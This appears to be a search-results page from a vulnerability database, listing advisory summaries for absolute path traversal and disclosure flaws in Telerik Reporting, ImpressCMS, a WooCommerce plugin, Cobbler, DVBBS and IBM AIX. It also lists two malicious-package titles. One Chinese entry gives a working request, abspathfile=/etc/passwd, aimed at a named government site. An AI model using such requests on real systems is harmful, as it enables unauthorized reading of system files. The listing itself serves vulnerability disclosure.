16 matches found
EUVD-2005-4063
Malware in sbrugna...
EUVD-2025-4302
Malicious code in bioql PyPI...
CVE-2024-6097
In Progress® Telerik® Reporting versions prior to 2025 Q1 19.0.25.211, information disclosure is possible by a local threat actor through an absolute path vulnerability...
Progress Telerik Reporting < 2025 Q1 (19.0.25.211) Information Disclosure
The version of Progress Telerik Reporting installed on the remote Windows host is prior or equal to 2025 QA 19.0.25.211. It is, therefore, affected by an information disclosure vulnerability. Information disclosure is possible by a local threat actor through an absolute path vulnerability. Note...
CVE-2024-6097
In Progress® Telerik® Reporting versions prior to 2025 Q1 19.0.25.211, information disclosure is possible by a local threat actor through an absolute path vulnerability...
CVE-2024-6097
Progress Telerik Reporting (Progress) is affected in versions prior to 2025 Q1 (19.0.25.211). The vulnerability is an information disclosure via an absolute path traversal that can be exploited by a local threat actor, as described in multiple sources. The CVE-2024-6097 entry confirms the impact ...
CVE-2024-6097 Absolute Path Traversal Vulnerability
In Progress® Telerik® Reporting versions prior to 2025 Q1 19.0.25.211, information disclosure is possible by a local threat actor through an absolute path vulnerability...
Progress Telerik Reporting 安全漏洞
Progress Telerik Reporting is a .NET report embedding tool from Progress, Inc. that enables the creation, design, export, and integration of reports in cloud-based, web and applications. A security vulnerability exists in Progress Telerik Reporting prior to version 2025 Q1, which stems from a loc...
Path traversal
Absolute path traversal vulnerability in htdocs/libraries/image-editor/image-edit.php in ImpressCMS before 1.3.6 allows remote attackers to delete arbitrary files via a full pathname in the imagepath parameter in a cancel action...
Path traversal
Absolute path traversal vulnerability in proxy.php in the google currency lookup in the Paypal Currency Converter Basic For WooCommerce plugin before 1.4 for WordPress allows remote attackers to read arbitrary files via a full pathname in the requrl parameter...
Path traversal
Absolute path traversal vulnerability in the web interface in Cobbler 2.4.x through 2.6.x allows remote authenticated users to read arbitrary files via the Kickstart field in a profile...
大汉网络JCMS任意文件下载
简要描述: 绝对路径文件下载的问题。 详细说明: 通过分析代码,某个下载功能没有限制权限,没有限制下载类型,通过设置绝对路径的参数,直接下载。 漏洞利用: jcms\m19\user\down.jsp?abspathfile=/etc/passwd 漏洞证明: 测试代码: http://www.njgl.gov.cn/jcms/m19/user/down.jsp?abspathfile=/etc/passwd 鼓楼区政府门户网站: 下载文件内容:...
动网(DVBBS)存在泄露绝对路径漏洞
问题出在DvClsMain.asp的44行: CacheName = LcaseReplaceReplaceReplaceServer.MapPath"index.asp","index.asp","",":","","\\\\","" 和46行: Forumsn = ReplaceCacheName,"","" 这里把web绝对路径放进Forumsn,在以cookie的形式返回给客户,导致web绝对路径泄漏。 DVBBS 7.1.0 更新最新补丁。...
CVE-2005-4068
Unspecified "absolute path vulnerability" in umountall in IBM AIX 5.1 through 5.3 allows local users to cause unknown impact via unknown vectors...
CVE-2005-4068
The CVE-2005-4068 entry concerns an unspecified absolute path vulnerability in the AIX utility umountall, affecting IBM AIX 5.1–5.3 with local-access implications (exact impact and vectors not disclosed in the provided documents). Connected sources identify vendor patches related to bos.rte.files...
CVE-2005-4068
Unspecified "absolute path vulnerability" in umountall in IBM AIX 5.1 through 5.3 allows local users to cause unknown impact via unknown vectors...